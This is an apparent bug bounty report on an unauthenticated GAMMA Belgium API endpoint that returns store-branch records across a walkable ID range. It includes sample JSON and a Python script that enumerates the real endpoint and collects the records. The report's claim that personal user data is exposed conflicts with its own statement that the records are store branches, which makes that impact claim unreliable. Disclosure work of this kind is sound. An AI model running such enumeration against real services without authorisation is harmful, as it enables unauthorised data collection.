User information disclosed via API endpoint


MkNayek

The data the report refers to as “system accounts” is served in full by an API endpoint that requires no authentication.

The main issue is the set of fields disclosed for every record: uid, name, address (street, streetNumber, apartment, zipCode, city, phone), geoLocation (latitude, longitude), distance and slug. Note that the objects in the sample response below describe GAMMA store branches (name, street address, phone number and coordinates).

Steps To Reproduce:

Navigate to the following URL: https://mijn.gamma.be/api/session-data/nearby-stores/201

Note: the trailing numeric path segment can be changed; the IDs 201 to 243 each return data and can be walked one by one, for example:

https://mijn.gamma.be/api/session-data/nearby-stores/202
https://mijn.gamma.be/api/session-data/nearby-stores/213
https://mijn.gamma.be/api/session-data/nearby-stores/243

Here is an example of what the endpoint returns (an array of store objects):

[
  {
    "uid": "668",
    "name": "GAMMA Hasselt-Runkst",
    "address": {"street": "Runkstersteenweg", "streetNumber": "245", "apartment": "", "zipCode": "3500", "city": "HASSELT", "phone": "+32 11 283666"},
    "geoLocation": {"latitude": 50.925085, "longitude": 5.3197},
    "distance": 2.93373162280325,
    "slug": "hasselt-runkst"
  },
  {
    "uid": "835",
    "name": "GAMMA Genk-Hasseltweg",
    "address": {"street": "Hasseltweg", "streetNumber": "196", "apartment": "", "zipCode": "3600", "city": "GENK", "phone": "+32 89 410370"},
    "geoLocation": {"latitude": 50.960724, "longitude": 5.454175},
    "distance": 7.86430226333355,
    "slug": "genk-hasseltweg"
  },
  {
    "uid": "237",
    "name": "GAMMA Genk Driehoeven",
    "address": {"street": "Gieterijstraat", "streetNumber": "8", "apartment": "", "zipCode": "3600", "city": "GENK", "phone": "+32 89 842473"},
    "geoLocation": {"latitude": 51.004547, "longitude": 5.491984},
    "distance": 12.1961682415492,
    "slug": "genk-driehoeven"
  }
]
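The reproduction steps above amount to walking an unauthenticated endpoint across an ID range and collecting what comes back. The script below is an added example written for this write-up, not the reporter's code: it iterates the path IDs, parses each JSON array, flattens the nested address and geoLocation fields into one row per uid, and de-duplicates records that appear under several IDs. The endpoint path and the 201–243 range are taken from the report; the sample responses are constructed from the JSON shape shown above so the script runs offline, and the urllib-based live_fetch() is provided but not invoked.

```python
"""Enumerate an unauthenticated JSON endpoint over an ID range and flatten what it returns.

Added example for this write-up, not the reporter's code. The endpoint path and the 201-243
ID range come from the report; the sample responses are constructed from the JSON shape the
report shows, so the script runs offline. live_fetch() is provided for a live run, not invoked.
"""
import json
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

BASE_URL = "https://mijn.gamma.be/api/session-data/nearby-stores/{id}"


def live_fetch(url: str, timeout: float = 10.0) -> str:
    """Plain GET with no cookie or token: the finding is that none is required."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample objects, copied from the example array in the report.
HASSELT = {
    "uid": "668", "name": "GAMMA Hasselt-Runkst",
    "address": {"street": "Runkstersteenweg", "streetNumber": "245", "apartment": "",
                "zipCode": "3500", "city": "HASSELT", "phone": "+32 11 283666"},
    "geoLocation": {"latitude": 50.925085, "longitude": 5.3197},
    "distance": 2.93373162280325, "slug": "hasselt-runkst",
}
GENK_HASSELTWEG = {
    "uid": "835", "name": "GAMMA Genk-Hasseltweg",
    "address": {"street": "Hasseltweg", "streetNumber": "196", "apartment": "",
                "zipCode": "3600", "city": "GENK", "phone": "+32 89 410370"},
    "geoLocation": {"latitude": 50.960724, "longitude": 5.454175},
    "distance": 7.86430226333355, "slug": "genk-hasseltweg",
}
GENK_DRIEHOEVEN = {
    "uid": "237", "name": "GAMMA Genk Driehoeven",
    "address": {"street": "Gieterijstraat", "streetNumber": "8", "apartment": "",
                "zipCode": "3600", "city": "GENK", "phone": "+32 89 842473"},
    "geoLocation": {"latitude": 51.004547, "longitude": 5.491984},
    "distance": 12.1961682415492, "slug": "genk-driehoeven",
}

# Constructed responses keyed by the ID in the URL path: 201 and 202 overlap on uid 835
# (with a different distance), 203 returns an empty body, 204 returns a non-JSON error page.
SAMPLE_RESPONSES = {
    201: json.dumps([HASSELT, GENK_HASSELTWEG]),
    202: json.dumps([dict(GENK_HASSELTWEG, distance=1.5), GENK_DRIEHOEVEN]),
    203: "",
    204: "<html><body>404 Not Found</body></html>",
}


def offline_fetch(url: str) -> str:
    """Stand-in for live_fetch() that serves the constructed responses above."""
    path_id = int(url.rsplit("/", 1)[1])
    return SAMPLE_RESPONSES.get(path_id, "")


def flatten(record: dict) -> dict:
    """Pull the nested address and geoLocation fields up into one flat row. 'distance' is
    dropped on purpose: it is measured from the queried ID and is not a property of the record."""
    address = record.get("address") or {}
    geo = record.get("geoLocation") or {}
    return {
        "uid": record.get("uid"), "name": record.get("name"), "slug": record.get("slug"),
        "street": address.get("street"), "streetNumber": address.get("streetNumber"),
        "apartment": address.get("apartment"), "zipCode": address.get("zipCode"),
        "city": address.get("city"), "phone": address.get("phone"),
        "latitude": geo.get("latitude"), "longitude": geo.get("longitude"),
    }


def enumerate_ids(ids: Iterable[int], fetch: Callable[[str], str]) -> Tuple[Dict[str, dict], List[int]]:
    """Walk the ID range, de-duplicate objects by uid, and list IDs whose body was not a JSON array."""
    records: Dict[str, dict] = {}
    unparsable: List[int] = []
    for path_id in ids:
        body = fetch(BASE_URL.format(id=path_id))
        if not body.strip():
            continue  # empty body: nothing behind this ID
        try:
            payload = json.loads(body)
        except json.JSONDecodeError:
            unparsable.append(path_id)  # error page, rate-limit response, etc.
            continue
        if not isinstance(payload, list):
            unparsable.append(path_id)
            continue
        for item in payload:
            row = flatten(item)
            if row["uid"] is not None:
                records.setdefault(row["uid"], row)  # first sighting wins
    return records, unparsable


if __name__ == "__main__":
    found, bad = enumerate_ids(range(201, 205), offline_fetch)
    print(f"{len(found)} unique records; unparsable responses for IDs {bad}")
```

Swapping offline_fetch for live_fetch turns this into the actual enumeration; keeping the fetcher injectable is also what lets the parsing and de-duplication be tested without touching the target. The unparsable list matters on a live run because an error page or a rate-limit response would otherwise be mistaken for an ID with no data.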

Supporting Material/References:

Hackerone report: https://hackerone.com/reports/1218461

Impact:

A threat actor could view personal information about users on the platform.

It is also possible, in principle, that a threat actor could use information gathered from this endpoint to identify future targets and footholds. Because no session is needed, the whole 201–243 range can be collected with a simple loop, so the exposure should be assessed as the full data set rather than a single record.
